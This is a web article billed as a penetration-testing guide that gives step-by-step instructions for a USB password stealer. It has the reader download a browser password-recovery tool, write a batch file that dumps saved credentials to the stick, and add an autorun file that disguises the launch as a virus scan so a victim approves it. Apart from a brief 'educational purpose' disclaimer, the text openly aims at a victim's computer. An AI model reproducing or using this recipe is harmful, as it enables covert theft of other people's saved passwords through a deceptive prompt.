Guide For Penetration Testing for USB Blocking
Windows allows the storage of the passwords, as do modern browsers. While this feature is convenient for users, it has imposed itself as a big security risk among organizations. We know that browsers store most passwords on daily basis, like MSN messenger, Yahoo, Facebook passwords, etc. Most people lack time and ask their browsers to save their passwords. As we know, there are many tools available to recover saved passwords, so in this article I will explain to you how to make a USB password stealer and steal saved passwords.
Just to explain the concept, we are going to collect some password stealing tools, tools that are freely available on the internet and capable of stealing the passwords stored in the browsers or other windows files.
Then, we create a batch program that will execute these combined programs and store the stolen usernames and passwords in a text file.
To further spice up the penetration testing demonstration, we will also make this batch file execute as an auto-run for the USB stick, effectively stealing the passwords as we plug it in.
***********************************
Things You Will Need:
1) Download the Web browser pass view Zip file from the given link and then insert your Pendrive to your computer and format it as NTFS (Quick Format)
2) In the next step, you need to create a New Folder in your PenDrive and name the folder as
“USB” and then extract the Web browser pass view ZIP file into the USB folder.
3) Then Open a Notepad and then copy the script given below and save the file as
USB Driver.bat
@echo off
cls
start \usb\WebBrowserPassView.exe /shtml 1.html
4) Again open a Notepad and then copy the script below and this time save the file as
Autorun.inf
[autorun] open=usbdriver.bat
Action=Perform a virus Scan
5) Now move both the files Autorun.inf and USBdriver.bat to your Pendrive
The tricky thing is whenever you will insert the USB drive into someone’ computer. it will ask you to perform a virus scan. Once you selected the yes all the password saved on victim’s computer will be saved into your Pendrive.
Open the Pendrive and double click on
USBDriver.bat to see all the passwords.
This article is just for educational purpose. So, whenever you suspect someone doing the same thing to you, immediately stop him/her. Hope you like the article, share it with others also.
**********************************************
